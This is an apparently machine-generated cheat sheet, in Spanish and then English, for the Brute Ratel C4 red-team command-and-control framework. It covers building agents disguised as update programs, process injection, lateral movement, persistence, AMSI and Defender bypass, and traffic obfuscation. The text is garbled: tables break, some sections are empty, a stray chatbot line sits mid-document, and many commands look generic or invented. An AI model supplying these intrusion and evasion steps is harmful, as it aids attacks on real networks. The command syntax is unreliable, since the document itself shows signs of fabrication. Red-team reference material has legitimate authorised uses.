Hoja de Referencia de Brute Ratel C4 Framework¶
Descripción General¶
Brute Ratel C4 (BRc4) es un framework comercial de Comando y Control (C2) personalizado diseñado para operaciones de red team y simulaciones de adversarios. Proporciona capacidades avanzadas de evasión, características sofisticadas de post-explotación y seguridad operacional de nivel profesional.
⚠️ Advertencia: Esta es una herramienta comercial que requiere una licencia válida. Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y ejercicios de red team. Asegúrese de tener la autorización adecuada antes de usarla en cualquier entorno.
Instalación¶
Activación de Licencia¶
# Activate license (requires valid license key)
./brc4 --activate <license-key>
# Verify license status
./brc4 --license-info
# Update license
./brc4 --update-license
Configuración del Servidor¶
# Start BRc4 server
./brc4 --server
# Start with custom configuration
./brc4 --server --config /path/to/config.json
# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443
Conexión del Cliente¶
# Connect to server
./brc4 --client --server 192.168.1.100:443
# Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token <token>
Referencia de Comandos¶
Gestión del Servidor¶
| Comando | Descripción |
|---|---|
help |
Mostrar menú de ayuda |
version |
Mostrar información de versión |
listeners |
Listar listeners activos |
badgers |
Lista de badgers (agentes) conectados |
operators |
Lista de operadores conectados |
exit |
Salir del servidor BRc4 |
| ### Gestión de Listeners | |
| Comando | Descripción |
| --------- | ------------- |
listener http |
Crear listener HTTP |
listener https |
Crear oyente HTTPS |
listener dns |
Crear listener DNS |
listener tcp |
Crear receptor TCP |
listener smb |
Crear listener SMB |
listener stop <id> |
Detener listener |
| ### Gestión de Badger (Agente) | |
| Comando | Descripción |
| --------- | ------------- |
badger <id> |
Interactuar con badger |
badger kill <id> |
Matar tejón |
badger sleep <time> |
Establecer intervalo de sueño |
badger jitter <percentage> |
Establecer porcentaje de jitter |
badger proxy <proxy> |
Establecer proxy para badger |
| ## Configuración de Listeners |
Listeners HTTP/HTTPS¶
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start
# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
start
Listener DNS¶
# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
start
Listener SMB¶
Listener TCP¶
Generación de Badgers¶
Badgers de Windows¶
# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate
# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate
# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generate
Badgers de Linux¶
# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate
# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generate
Badgers de macOS¶
# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate
# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generate
Comandos de Post-Explotación¶
Información del Sistema¶
# Get system information
sysinfo
# Get current user
whoami
# Get privileges
getprivs
# Get environment variables
env
# Get network interfaces
ifconfig
Operaciones de Archivos¶
# List directory
ls /path/to/directory
# Change directory
cd /path/to/directory
# Download file
download /remote/path/file.txt
# Upload file
upload /local/path/file.txt /remote/path/
# Execute file
execute /path/to/executable
# Delete file
rm /path/to/file
Gestión de Procesos¶
# List processes
ps
# Kill process
kill <pid>
# Migrate to process
migrate <pid>
# Inject into process
inject <pid> <payload>
# Create process
spawn <executable>
Operaciones de Red¶
# Network connections
netstat
# ARP table
arp
# Routing table
route
# Port scan
portscan 192.168.1.0/24 80,443,3389
# Ping sweep
ping 192.168.1.0/24
Características Avanzadas¶
Perfiles C2 Moldeables¶
# Load malleable profile
set malleable /path/to/profile.profile
# Custom HTTP profile
http-get \\\\{
set uri "/api/v1/status";
client \\\\{
header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
header "Accept" "application/json";
\\\\}
server \\\\{
header "Content-Type" "application/json";
output \\\\{
print;
\\\\}
\\\\}
\\\\}
Técnicas de Inyección de Procesos¶
Would you like me to continue with the remaining sections?```bash
Classic DLL injection¶
inject-dll
Process hollowing¶
hollow
Reflective DLL loading¶
reflective-dll /path/to/dll.dll
Manual DLL mapping¶
map-dll
Thread hijacking¶
hijack-thread
Lateral Movement¶
# WMI execution
wmi-exec 192.168.1.10 "whoami"
# PSExec
psexec 192.168.1.10 "whoami"
# SMB execution
smb-exec 192.168.1.10 "whoami"
# DCOM execution
dcom-exec 192.168.1.10 "whoami"
# WinRM execution
winrm-exec 192.168.1.10 "whoami"
Persistence Mechanisms¶
# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"
# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily
# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"
# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"
# Startup folder
persist-startup "C:\temp\badger.exe"
Evasion Techniques¶
Anti-Analysis¶
# VM detection
vm-detect
# Sandbox evasion
sandbox-evasion
# Debugger detection
debugger-detect
# Sleep evasion
sleep-evasion 300
# User interaction check
user-interaction
AMSI/ETW Bypass¶
# AMSI bypass
amsi-bypass
# ETW bypass
etw-bypass
# Disable Windows Defender
disable-defender
# Unhook DLLs
unhook-dlls
# Patch AMSI
patch-amsi
Traffic Obfuscation¶
# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com
# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"
# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"
Payload Obfuscation¶
# Encrypt payload
encrypt-payload aes256 <key>
# Obfuscate strings
obfuscate-strings
# Pack executable
pack-exe upx
# Sign executable
sign-exe /path/to/cert.pfx
# Polymorphic generation
polymorphic-gen
Operational Security¶
Communication Security¶
# Use encrypted channels
set encryption aes256
# Certificate pinning
set cert-pinning true
# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384
# Jitter configuration
set jitter 20
set jitter-type random
Infrastructure Management¶
# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443
# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"
# Failover configuration
set failover-servers "backup1.com,backup2.com"
Logging and Monitoring¶
# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log
# Operator tracking
set operator-logging true
# Command auditing
set command-audit true
# Session recording
set session-recording true
Team Operations¶
Multi-Operator Support¶
# Add operator
operator add username password
# Set operator permissions
operator permissions username read,write,execute
# Operator sessions
operator sessions
# Kick operator
operator kick username
Collaboration Features¶
# Share badger session
share-session <badger-id> <operator>
# Session notes
note-add "Important finding"
note-list
note-delete <note-id>
# Team chat
chat "Message to team"
chat-history
Troubleshooting¶
Connection Issues¶
# Test listener
test-listener <listener-id>
# Check connectivity
test-connectivity <target>
# Verify certificates
verify-cert /path/to/cert.pem
# Debug mode
set debug true
Badger Issues¶
# Badger health check
health-check <badger-id>
# Reset badger
reset-badger <badger-id>
# Badger diagnostics
diagnostics <badger-id>
# Force reconnect
reconnect <badger-id>
Performance Optimization¶
# Optimize sleep intervals
set sleep-optimization true
# Bandwidth throttling
set bandwidth-limit 1024
# Connection pooling
set connection-pooling true
# Compression
set compression gzip
Configuration¶
Server Configuration¶
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 443,
"ssl": true,
"cert": "/path/to/cert.pem",
"key": "/path/to/key.pem"
\\\\},
"database": \\\\{
"type": "sqlite",
"path": "/opt/brc4/database.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "/var/log/brc4.log"
\\\\}
\\\\}
Malleable Profile¶
# Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
http-get \\\\{
set uri "/api/status";
client \\\\{
header "Accept" "application/json";
header "Accept-Language" "en-US,en;q=0.9";
\\\\}
server \\\\{
header "Content-Type" "application/json";
output \\\\{
print;
\\\\}
\\\\}
\\\\}
Resources¶
- Brute Ratel C4 Official Website
- BRc4 Documentation
- [Red Team Operations Guide](https://bruteratel.com/research/Perfiles de C2 Malleable
Esta hoja de referencia proporciona una referencia completa para usar Brute Ratel C4. Esta es una herramienta comercial que requiere una licencia adecuada. Siempre asegúrese de tener la autorización adecuada antes de usar esta herramienta en cualquier entorno.